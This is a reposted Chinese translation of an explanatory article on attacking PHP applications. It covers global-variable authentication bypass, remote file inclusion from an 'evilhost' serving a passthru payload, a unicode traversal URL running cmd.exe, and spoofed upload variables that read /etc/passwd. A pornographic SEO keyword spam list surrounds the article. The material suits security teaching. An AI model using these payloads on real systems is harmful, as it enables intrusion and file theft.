久久福利_99r_国产日韩在线视频_直接看av的网站_中文欧美日韩_久久一

您的位置:首頁技術文章
文章詳情頁

如何對PHP程序中的常見漏洞進行攻擊(上)

瀏覽:16日期:2024-01-24 10:30:16
如何對PHP程序中的常見漏洞進行攻擊(上) 翻譯:analysist(分析家) 來源:http://www.china4lert.org 如何對PHP程序中的常見漏洞進行攻擊(上) 原著:Shaun Clowes <http://www.securereality.com.au/> 翻譯:analysist <http://www.nsfocus.com/> 之所以翻譯這篇文章,是因為目前關于CGI安全性的文章都是拿Perl作為例子,而專門介紹ASP,PHP或者JSP安全性的文章則很少。Shaun Clowes的這篇文章比較全面地介紹了PHP的安全問題,原文可以在http://www.securereality.com.au/studyinscarlet.txt找到。 由于原文比較長,而且有相當一部分是介紹文章的背景或PHP的基礎知識,沒有涉及到PHP安全方面的內容,因此我沒有翻譯。如果你想了解這方面的知識,請參考原文。 文章主要從全局變量,遠程文件,文件上載,庫文件,Session文件,數據類型和容易出錯的函數這幾個方面分析了PHP的安全性,并且對如何增強PHP的安全性提出了一些有用的建議。 好了,廢話少說,我們言歸正傳! [全局變量] PHP中的變量不需要事先聲明,它們會在第一次使用時自動創建,它們的類型也不需要指定,它們會根據上下文環境自動確定。從程序員的角度來看,這無疑是一種極其方便的處理方法。很顯然,這也是快速開發語言的一個很有用的特點。一旦一個變量被創建了,就可以在程序中的任何地方使用。這個特點導致的結果就是程序員很少初始化變量,畢竟,當它們第一次創建時,他們是空的。 很顯然,基于PHP的應用程序的主函數一般都是接受用戶的輸入(主要是表單變量,上載文件和Cookie等),然后對輸入數據進行處理,然后把結果返回到客戶端瀏覽器。為了使PHP代碼訪問用戶的輸入盡可能容易,實際上PHP是把這些輸入數據看作全局變量來處理的。 例如: <FORM METHOD="GET" ACTION="test.php"> <INPUT TYPE="TEXT" NAME="hello"> <INPUT TYPE="SUBMIT"> </FORM> 很顯然,這會顯示一個文本框和提交按鈕。當用戶點擊提交按鈕時,“test.php”會處理用戶的輸入,當“test.php”運行時,“$hello”會包含用戶在文本框輸入的數據。從這里我們應該看出,攻擊者可以按照自己的意愿創建任意的全局變量。如果攻擊者不是通過表單輸入來調用“test.php”,而是直接在瀏覽器地址欄輸入http://server/test.php?hello=hi&setup=no,那么,不止是“$hello”被創建,“$setup”也被創建了。 譯者注:這兩種方法也就是我們通常說的“POST”和“GET”方法。 下面的用戶認證代碼暴露了PHP的全局變量所導致的安全問題: <?php ;;if ($pass == "hello") ;;;;$auth = 1; ;;... ;;if ($auth == 1) ;;;;echo "some important information"?> 上面的代碼首先檢查用戶的密碼是否為“hello”,如果匹配的話,設置“$auth”為“1”,即通過認證。之后如果“$suth”為“1”的話,就會顯示一些重要信息。 表面看起來是正確的,而且我們中有相當一部分人是這樣做的,但是這段代碼犯了想當然的錯誤,它假定“$auth”在沒有設置值的時候是空的,卻沒有想到攻擊者可以創建任何全局變量并賦值,通過類似“http://server/test.php?auth=1”的方法,我們完全可以欺騙這段代碼,使它相信我們是已經認證過的。 因此,為了提高PHP程序的安全性,我們不能相信任何沒有明確定義的變量。如果程序中的變量很多的話,這可是一項非常艱巨的任務。 一種常用的保護方式就是檢查數組HTTP_GET[]或POST_VARS[]中的變量,這依賴于我們的提交方式(GET或POST)。當PHP配置為打開“track_vars”選項的話(這是缺省值),用戶提交的變量就可以在全局變量和上面提到的數組中獲得。 但是值得說明的是,PHP有四個不同的數組變量用來處理用戶的輸入。HTTP_GET_VARS數組用來處理GET方式提交的變量,HTTP_POST_VARS數組用于處理POST方式提交的變量,HTTP_COOKIE_VARS數組用于處理作為cookie頭提交的變量,而對于HTTP_POST_FILES數組(比較新的PHP才提供),則完全是用戶用來提交變量的一種可選方式。用戶的一個請求可以很容易的把變量存在這四個數組中,因此一個安全的PHP程序應該檢查這四個數組。 [遠程文件] PHP是一種具有豐富特性的語言,提供了大量的函數,使編程者實現某個功能很容易。但是從安全的角度來看,功能越多,要保證它的安全性就越難,遠程文件就是說明這個問題的一個很好的例子: <?php ;;if (!($fd = fopen("$filename", "r")) ;;;;echo("Could not open file: $filename<BR>n"); ?> 上面的腳本試圖打開文件“$filename”,如果失敗就顯示錯誤信息。很明顯,如果我們能夠指定“$filename”的話,就能利用這個腳本瀏覽系統中的任何文件。但是,這個腳本還存在一個不太明顯的特性,那就是它可以從任何其它WEB或FTP站點讀取文件。實際上,PHP的大多數文件處理函數對遠程文件的處理是透明的。 例如: 如果指定“$filename”為“http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir” 則上面的代碼實際上是利用主機target上的unicode漏洞,執行了dir命令。 這使得支持遠程文件的include(),require(),include_once()和require_once()在上下文環境中變得更有趣。這些函數主要功能是包含指定文件的內容,并且把它們按照PHP代碼解釋,主要是用在庫文件上。 例如: <?php ;;include($libdir . "/languages.php"); ?> 上例中“$libdir”一般是一個在執行代碼前已經設置好的路徑,如果攻擊者能夠使得“$libdir”沒有被設置的話,那么他就可以改變這個路徑。但是攻擊者并不能做任何事情,因為他們只能在他們指定的路徑中訪問文件languages.php(perl中的“Poison null byte”攻擊對PHP沒有作用)。但是由于有了對遠程文件的支持,攻擊者就可以做任何事情。例如,攻擊者可以在某臺服務器上放一個文件languages.php,包含如下內容: <?php ;;passthru("/bin/ls /etc"); ?> 然后把“$libdir”設置為“http://<evilhost>/”,這樣我們就可以在目標主機上執行上面的攻擊代碼,“/etc”目錄的內容作為結果返回到客戶的瀏覽器中。 需要注意的是,攻擊服務器(也就是evilhost)應該不能執行PHP代碼,否則攻擊代碼會在攻擊服務器,而不是目標服務器執行,如果你想了解具體的技術細節,請參考:http://www.securereality.com.au/sradv00006.txt [文件上載] PHP自動支持基于RFC 1867的文件上載,我們看下面的例子: <FORM METHOD="POST" ENCTYPE="multipart/form-data"> <INPUT TYPE="FILE" NAME="hello"> <INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240"> <INPUT TYPE="SUBMIT"> </FORM> 上面的代碼讓用戶從本地機器選擇一個文件,當點擊提交后,文件就會被上載到服務器。這顯然是很有用的功能,但是PHP的響應方式使這項功能變的不安全。當PHP第一次接到這種請求,甚至在它開始解析被調用的PHP代碼之前,它會先接受遠程用戶的文件,檢查文件的長度是否超過“$MAX_FILE_SIZE variable”定義的值,如果通過這些測試的話,文件就會被存在本地的一個臨時目錄中。 因此,攻擊者可以發送任意文件給運行PHP的主機,在PHP程序還沒有決定是否接受文件上載時,文件已經被存在服務器上了。 這里我就不討論利用文件上載來對服務器進行DOS攻擊的可能性了。 讓我們考慮一下處理文件上載的PHP程序,正如我們上面說的,文件被接收并且存在服務器上(位置是在配置文件中指定的,一般是/tmp),擴展名一般是隨機的,類似“phpxXuoXG”的形式。PHP程序需要上載文件的信息以便處理它,這可以通過兩種方式,一種方式是在PHP 3中已經使用的,另一種是在我們對以前的方法提出安全公告后引入的。 但是,我們可以肯定的說,問題還是存在的,大多數PHP程序還是使用老的方式來處理上載文件。PHP設置了四個全局變量來描述上載文件,比如說上面的例子: $hello = Filename on local machine (e.g "/tmp/phpxXuoXG") $hello_size = Size in bytes of file (e.g 1024) $hello_name = The original name of the file on the remote system (e.g "c:temphello.txt") $hello_type = Mime type of uploaded file (e.g "text/plain") 然后PHP程序開始處理根據“$hello”指定的文件,問題在于“$hello”不一定是一個PHP設置的變量,任何遠程用戶都可以指定它。如果我們使用下面的方式: http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt 就導致了下面的PHP全局變量(當然POST方式也可以(甚至是Cookie)): $hello = "/etc/passwd" $hello_size = 10240 $hello_type = "text/plain" $hello_name = "hello.txt" 上面的表單數據正好滿足了PHP程序所期望的變量,但是這時PHP程序不再處理上載的文件,而是處理“/etc/passwd”(通常會導致內容暴露)。這種攻擊可以用于暴露任何敏感文件的內容。 我在前面已經說了,新版本的PHP使用HTTP_POST_FILES[]來決定上載文件,同時也提供了很多函數來解決這個問題,例如有一個函數用來判斷某個文件是不是實際上載的文件。這些函數很好的解決了這個問題,但是實際上肯定有很多PHP程序仍然使用舊的方法,很容易受到這種攻擊。 作為文件上載的攻擊方法的一個變種,我們看一下下面的一段代碼: <?php ;;if (file_exists($theme)) // Checks the file exists on the local system (no remote files) include("$theme"); ?> 如果攻擊者可以控制“$theme”的話,很顯然它可以利用“$theme”來讀取遠程系統上的任何文件。攻擊者的最終目標是在遠程服務器上執行任意指令,但是他無法使用遠程文件,因此,他必須得在遠程服務器上創建一個PHP文件。這乍看起來好象是不可能的,但是文件上載幫了我們這個忙,如果攻擊者先在本地機器上創建一個包含PHP代碼的文件,然后創建一個包含名為“theme”的文件域的表單,最后用這個表單通過文件上載把創建的包含PHP代碼的文件提交給上面的代碼,PHP就會把攻擊者提交的文件保存起來,并把“$theme”的值設置為攻擊者提交的文件,這樣file_exists()函數會檢查通過,攻擊者的代碼也將執行。 獲得執行任意指令的能力之后,攻擊者顯然想提升權限或者是擴大戰果,而這又需要一些服務器上沒有的工具集,而文件上載又一次幫了我們這個忙。攻擊者可以使用文件上載功能上載工具,把她們存在服務器上,然后利用他們執行指令的能力,使用chmod()改變文件的權限,然后執行。例如:攻擊者可以繞過防火墻或IDS上載一個本地root攻擊程序,然后執行,這樣就獲得了root權限。 <未完待續>
標簽: PHP
主站蜘蛛池模板: 亚洲色图偷拍视频 | 国产黄视频在线 | www.久久久.com | 日韩一区二区不卡 | 欧美亚洲国产一区 | 国产一区二区影院 | 亚洲网站在线免费观看 | 亚洲成人精品一区二区三区 | 免费黄色网址在线播放 | 久久福利电影 | 欧美午夜视频在线观看 | 国产精品欧美久久久久一区二区 | 日本中文在线 | 日韩毛片 | 色综合久久久久久久久久久 | 久久亚洲综合 | 久久精品首页 | 看亚洲a级一级毛片 | 91中文视频 | 一级片免费在线视频 | 欧美综合一区 | 最新国产精品 | 四虎视频| 国产成人 综合 亚洲 | 日韩性xxx| 成人午夜在线观看 | 日韩国伦理久久一区 | 亚洲精品无 | 国产色片在线 | 欧美一二三四成人免费视频 | 日韩成人免费av | 一区二区三区国产 | 午夜午夜精品一区二区三区文 | 亚洲三区视频 | 999在线观看视频 | 婷婷激情五月 | 国产在线专区 | 久久久久久久久久久久久av | 美女张开腿视频网站免费 | 综合久久综合久久 | 欧美精品一区在线观看 | 国产亚洲网站 | 一二三四在线视频观看社区 | 中文字幕高清av | 精品国产欧美一区二区三区成人 | 欧美日韩中文字幕在线 | 午夜午夜精品一区二区三区文 | 日韩免费在线观看视频 | 色av综合在线 | 日韩欧美在线综合 | 91精品国产色综合久久 | 亚洲区视频在线 | 久久伊人影院 | 黄色福利| 色综久久 | 欧美一区二区三区 | 久久久久亚洲av毛片大全 | 亚洲精品久久久久久下一站 | 先锋资源中文字幕 | 国产精品99久久久久久大便 | 最新高清无码专区 | 综合激情av| 黄色网亚洲 | 一区二区三区影视 | 亚洲一区日韩 | 三级黄色片在线观看 | 欧美一区二区三区黄 | 91av导航| 亚洲生活片 | 操操网站 | 538在线精品 | 在线中文日韩 | 九色视频网站 | 亚洲一区久久久 | 国产免费自拍 | 日韩精品专区在线影院重磅 | 99热国产在线观看 | 久久久免费电影 | 天堂精品一区二区三区 | 精品国产一区二区三区性色av | 韩日一区 | 日本私人网站在线观看 | 久久免费精品 | 国产第一二区 | 午夜电影在线看 | 人操人人 | 日韩日b视频 | 精品国产乱码久久久久久1区2区 | 久久精品亚洲一区二区 | 久久mm| 涩涩导航| 国产高清一区 | 一区二区在线 | 欧美性一区二区三区 | 亚洲免费人成在线视频观看 | 黄色影片网址 | 人人草视频在线观看 | 成人午夜激情 | 欧美一级毛片免费看 | 亚洲一级在线观看 | 亚洲视频一区在线 | 99精品久久久 | 特级av| 欧美成人综合视频 | 国产欧美一区二区精品婷 | 久久亚洲一区二区三区四区 | www.久久久| 国产精品久久一区 | 欧美自拍视频在线 | 久久久久久久91 | 欧美性影院| 欧美寡妇偷汉性猛交 | 久久爱综合 | 欧美xxxx色视频在线观看免费 | 日韩精品免费观看 | 婷婷91| 日韩大尺度电影在线观看 | 国产精品毛片无码 | 免费一级在线观看 | 九一视频在线播放 | 亚洲视频在线看 | 色135综合网 | 日韩一区二区在线观看 | 男女羞羞视频在线免费观看 | 亚洲成人av在线播放 | 欧美日韩免费看 | 欧美午夜视频在线观看 | 亚洲美女视频 | 久久四色 | 欧美成人免费网站 | 亚洲国产精品人人爽夜夜爽 | 亚洲国产精品第一区二区 | 天天天天天天操 | 午夜小电影 | 黄色网页大全 | 欧美日本国产 | 91精品国产综合久久久久久 | 国产激情视频在线观看 | 国产九九九 | 欧美精品在线一区 | 久久99精品久久久久婷婷暖91 | 在线视频亚洲 | 久久一| 能免费看的av | 嫩草视频免费在线观看 | 亚洲国产精品成人无久久精品 | 欧美精品一区二区在线观看 | 伊人最新网址 | 日一日干一干 | 国产精品99久久久久久宅男 | 久久久久久香蕉 | 国产精品久久国产精品 | 蜜臀网 | 国产高清一区 | 久久草在线视频 | 国产麻豆乱码精品一区二区三区 | 北条麻妃一区二区三区在线 | 国产成人午夜精品影院游乐网 | 亚洲免费观看视频 | 久久国产精品久久久久久电车 | 亚洲成人精品网 | 精品欧美一区二区三区久久久 | 天天久久综合网 | 亚洲 欧美 另类 综合 偷拍 | 日韩精品久久 | 综合网亚洲 | 婷婷色视频 | 中文av字幕 | 97在线观看视频 | 一级毛片视频 | 精品一区二区三区在线视频 | 国产高清视频在线观看 | 欧洲美女7788成人免费视频 | 精品伦理一区二区三区 | 91丨九色丨国产在线 | 国际精品久久 | 午夜视频网| 日本精品一区二区三区在线观看视频 | 国产精品久久久久久久久久久久久 | 天天操天天碰 | 亚洲视频在线一区 | 国产精品一区久久久久 | 国产偷国产偷精品高清尤物 | 98精品国产高清在线xxxx天堂 | 久久一二 | 国产精品免费观看 | 日韩a电影| 欧美日韩国产高清视频 | 国产一区二区三区久久久久久久久 | 国产精品视频 | 91精品在线观看入口 | 中文一区| 久久久久综合 | 久久亚洲视频 | 精品久久久久一区二区国产 | 亚洲一区二区三区四区在线观看 | 精品国产一区二区三区小蝌蚪 | 91视频在线 | 精品久久久久久久久久久久久 | 亚洲午夜精品片久久www慈禧 | 久久久久国产精品视频 | 人人干人人干 | 国产精品久久久精品 | 国产精品久久久久久久久久久杏吧 | 国产精品久久九九 | 三级黄色片在线观看 | 9久久精品 | 午夜免费视频福利 | 香蕉二区 | 涩涩视频在线 | 中文字幕1区 | 九九热视频在线 | 久久精品国产99国产 | 久久在线 | 99热在线播放| 一本一道久久a久久精品逆3p | 欧美日韩高清不卡 | 超碰免费在 | 久久av一区二区三区亚洲 | 精品视频一区二区三区在线观看 | 国产精品毛片一区二区在线看 | 另类a v| 国产精品久久久久久久久久久久久久 | 亚洲免费观看 | 视频一区二区三区在线播放 | av午夜电影 | www.久| 最新国产在线 | 久久国产精品一区二区 | 九九视频在线 | 欧美区在线 | 亚洲日本韩国欧美 | 亚洲三区在线观看 | 欧洲成人午夜免费大片 | 国内精品一级毛片国产99 | 人人干人人干人人干 | 国产综合视频在线观看 | 91视频一88av| 国产丝袜人妖ts黄檬 | 国产男女免费视频 | 在线观看国产视频 | 成人午夜在线 | 日韩一级免费在线观看 | 日韩精品专区 | 日韩av一区二区三区四区 | 99视频精品 | 成人一区二区在线 | 国产在线a| 日一日干一干 | 五月激情综合网 | 日韩一二区视频 | 免费一级毛片 | 天天插天天操 | 欧美精品一区二区三区在线四季 | 91亚洲免费视频 | 亚洲精品一二三四五区 | 国产电影一区二区三区图片 | 免费av电影观看 | 精品国产一区二区三区性色 | 久久精品这里热有精品 | 日韩国产中文字幕 | 97成人在线视频 | 黄网免费 | 国产96在线视频 | 一区二区手机在线 | 91在线视频一区 | 欧美国产一区二区 | 久久青草国产 | 亚洲午夜精品在线观看 | 亚洲av一级毛片 | 91文字幕巨乱亚洲香蕉 | 国产成人精品免费 | 国产精品久久久久久久福利院 | 久久黄网 | 青青草视频免费观看 | 久久精品色欧美aⅴ一区二区 | 尤物视频在线观看 | 国产三级在线 | 国产日韩欧美在线 | 不卡黄色 | 永久av| 国产区免费观看 | 国产91在线 | 亚洲 | 日韩久久一区二区 | 国产一区二区视频在线观看 | 免费看一区二区三区 | 成人午夜精品久久久久久久蜜臀 | 精品国产一区二区三区在线观看 | 精品人成 | 精品久久久99 | 欧美精品一区二区三区一线天视频 | 久久高清 | 国产色99精品9i | 国产91久久精品一区二区 | 一区二区三区国产亚洲网站 | 成人区一区二区三区 | 性色在线 | 亚洲精品综合 | 男女视频在线观看 | 久久99视频这里只有精品 | 日本免费电影一区 | 国产日韩精品在线 | 97视频在线| 欧美在线观看免费观看视频 | 91精品久久久久久久久 | 中文字幕精品一区 | 欧美日韩国产一区二区在线观看 | www.亚洲 | 91精品国产综合久久婷婷香蕉 | 亚洲免费一区 | 人人爽在线观看 | 亚洲第一中文字幕 | 午夜国产一级片 | 国产成人啪精品午夜在线观看 | 成人 在线 | 成年人黄色一级片 | 99精品国产高清一区二区麻豆 | 国产精品久久国产精品99 gif | 中文字幕av一区二区 | 国产日韩欧美一二三区 | 福利视频二区 | 91.成人天堂一区 | 欧美成人激情 | 国产在线不卡 | 日韩欧美一区二区视频 | 国产一级视频 | 99国产精品久久久久久久 | 国产成人精品免费视频大全最热 | 色婷婷综合在线 | 午夜成人免费电影 | 麻豆成人在线 | 日日摸夜夜添夜夜添亚洲女人 | 亚洲精品一区二区三区蜜桃久 | 久久久免费视频看看 | 国产精品一区久久久 | 久久中文视频 | 91操碰 | 国产欧美中文字幕 | 天天爽夜夜爽夜夜爽精品视频 | 亚洲精品一区二区网址 | 羞羞视频免费观看入口 | 国产毛片视频 | 久久全国免费视频 | 欧美精产国品一二三区 | 亚洲欧洲一区二区 | 国产精品夜色一区二区三区 | 久久久久久毛片免费观看 | 色一色网站 | 国产精品影院在线观看 | 91视在线国内在线播放酒店 | 国产成人一级片 | 久久久久久91亚洲精品中文字幕 | 中文字幕第9页 | 日韩av视屏 | av一区二区在线观看 | 国产日产欧美a级毛片 | 久久亚洲精品视频 | 精品九九 | 国产成人影院在线观看 | 亚洲自拍偷拍欧美 | 久久99精品久久久 | 欧美日在线| 吴梦梦到粉丝家实战华中在线观看 | 亚洲毛片在线观看 | 欧美日韩国产高清 | 综合一区二区三区 | 日日人人 | 国产精品美女一区二区三区四区 | 精品在线播放 | 青青草一区 | 久久精品一区二区三区四区 | 日本三级做a全过程在线观看 | 国产黄色免费网站 | 欧美五月 | 曰韩在线 | 精品国产一区二区三区性色av | 亚洲欧美在线免费观看 | 亚洲成av人片在线观看 | 国产精品爱久久久久久久 | 成人影院www在线观看 | 欧美成人免费在线观看 | 精品一区在线 | 97超碰人人 | 欧美日本一区 | 成人黄色一级网站 | 亚洲欧美v国产一区二区 | 天天综合7799精品影视 | 国产艹| 日韩在线色 | 久久久久久久久国产 | av高清在线免费观看 | 日韩成人精品 | 自拍偷拍专区 | 欧美日一区二区 | 欧美三级电影在线播放 | 日本久久精品视频 | 成人av免费 | 中文字幕第66页 | 欧美一级视频在线观看 | 日韩在线视频网站 | 台湾av片 | 欧美精品网站 | 亚洲欧美一区二区三区在线 | 视频在线一区二区三区 | 91在线精品一区二区 | 久久精品成人 | 国产a视频 | 私人毛片免费高清视频 | 亚洲高清视频一区二区 | 精品久久久一 | 午夜视频网址 | 国产欧美日韩在线观看 | 欧美福利一区二区三区 | 三级黄色片在线播放 | 香蕉久久久 | 国产精品美女视频一区二区三区 | 亚洲精品大片 | 国产99999 | 成人精品网站在线观看 | 亚洲欧美电影 | 夜夜艹 | 中文字幕日韩欧美一区二区三区 | 黄色一级毛片在线观看 | 成人免费淫片aa视频免费 | www.欧美 | 国产精品国产精品国产专区不卡 | a级在线观看免费 | 欧美在线a | 成人av片在线观看 | 99精品网 | 国产精品久久久久久久久免费高清 | 伊人久久艹 | 亚洲精品国产乱码在线看蜜月 | 91久久久久久久 | 一区二区三区在线播放 | 欧美精品激情 | 中文字幕一二三区 | 亚洲精品久久久久久一区二区 | 精品久久久久久久久久久久 | 91精品久久久久久久久久入口 | 久久久中文| 精品亚洲一区二区三区四区五区 | 日日爱999 | 欧美成人免费 | 国产精品永久免费自在线观看 | 国产成人黄色 | 1区2区免费视频 | 日韩在线中文字幕 | 国产传媒在线视频 | 天天摸夜夜摸爽爽狠狠婷婷97 | 精品视频一区二区三区 | 男女午夜网站 | 久久一区国产 | 日本三级在线视频 | 亚洲精品国产高清 | 久久99视频 | 日本精品免费 | 国产在线观看欧美 | 亚洲伊人成人 | 五月婷综合 | 日日摸日日碰夜夜爽不卡dvd | a久久| 成人 在线 | 三级视频在线 | 国产丝袜人妖ts黄檬 | 国产精品12 | 国产一区二区三区免费在线 | 探花在线观看 | 精品久久久久久国产 | 99热福利 | 欧美激情一区 | 91综合视频在线观看 | 亚洲成人黄色 | 在线观看91| 国产一区二区精品在线观看 | 另类天堂av | 一区二区三区免费 | 国产精品极品美女在线观看免费 | 成年人网站在线免费观看 | 国产成人在线免费观看 | av网站推荐 | 免费毛片一区二区三区久久久 | 一级黄色录像免费观看 | 国产日产欧美a级毛片 | 91黄色在线观看 | 一级a毛片免费 | 毛片在线视频 | 欧美精品成人一区二区在线 | 色久天堂 | 午夜免费观看网站 | 君岛美绪一区二区三区 | 99精品国产一区二区 | av午夜电影 | 久久久久久免费看 | 午夜视频在线免费观看 | 国内精品三级 | 电影91久久久 | 精品国偷自产在线 | 午夜精品成人一区二区 | 欧美日韩精品亚洲 | 久久久91 | 免费黄色录像视频 | 国产成人av一区二区三区 | 欧美一级h | 久草久草久草 | 欧美一区国产一区 | 草草影院ccyycom | 蜜桃免费视频 | xxxx网 | 久久影音先锋 | 日韩一区在线视频 | 日韩激情网 | 免费成人在线电影 | 伊人精品 | 欧美电影一区 | 中文字幕在线观看一区二区三区 | 国产一级片一区二区三区 | 久久视频免费在线 | 黄色av网站在线观看 | 国产成人一区二区三区 | 欧美国产日韩一区 | 亚洲成人高清 | 精品福利在线视频 | 精品久久久久久久久久久久久久 | 亚洲一区二区三区四区五区中文 | 亚洲精品视频在线免费播放 | 欧美在线一级 | 国产精品一区二区久久久久 | 免费看性生交大片 | 国产婷婷精品av在线 | 色香蕉久久 | www.色涩涩.com网站 | 国产高清不卡在线 | 羞羞的视频在线免费观看 | 久久久久久黄 | 久久青草av | 日韩精品久久久久久 | 国产精品久久久999 成人亚洲视频 | 综合久草| 免费在线成人av | 亚洲精品美女在线观看 | 成年人免费在线视频 | 91午夜伦伦电影理论片 | 日本黄色一级片免费看 | 欧美成人在线网站 | 美女精品视频 | 久久久精 | 国产高潮呻吟久久渣男片 | yy6080久久伦理一区二区 | 亚洲精品国产区 | 在线观看日韩 | 91婷婷射| 婷婷久久五月 | 欧美日日干| 日韩精品一区二区三区在线播放 | 国产日韩欧美 | 亚洲大尺度网站 | 久久久久久亚洲国产 | 国产精品久久久久久久久久小说 | h视频免费在线 | 亚洲综合99 | 日日操夜夜 | www.久久 | 日韩成人免费 | 性高湖久久久久久久久 | 色资源站 | 欧美日韩在线精品 | 操操网| 国产一区二区观看 | 久久久99精品免费观看 | 国产精品a久久 | 国产目拍亚洲精品99久久精品 | 免费观看视频www | 国产欧美日本 | 天天干一干 | 四虎永久免费影视 | 日日干夜夜骑 | 在线a视频 | 欧美激情视频一区二区三区在线播放 | 国产精品美女视频 | 欧美精品一区二区三区蜜桃视频 | 一级黄免费看 | 久久久久久久久久久久91 | 久久精品在线 | 狠狠爱天天操 | 国产精品精品视频一区二区三区 | 一区二区三区欧美在线 | 欧美在线一二三 | 美国一级毛片a | 久久亚洲精品国产一区 | 97碰碰碰免费公开在线视频 | 久久久久久一区 | 成人久久久精品乱码一区二区三区 | 欧美日在线 | 亚洲高清一区二区三区 | 久久精品国产99国产精品 | 国产精品s色 | 日韩不卡在线 | 精品久久久久香蕉网 | 免费在线h | 精品国产一区二区三区在线观看 | 中文成人在线 | 日韩三区 | 国产精品久久久久久久久动漫 | 成人福利在线 | av网站免费看 | 久久久免费 | 国产成人精品一区二区三区在线 | 成人精品一区二区三区 | 日韩欧美黄色 | 久久久久久久成人 | 免费看的毛片 | 欧美成人一区二区三区片免费 | 久久精品中文字幕 | 国产91免费在线 |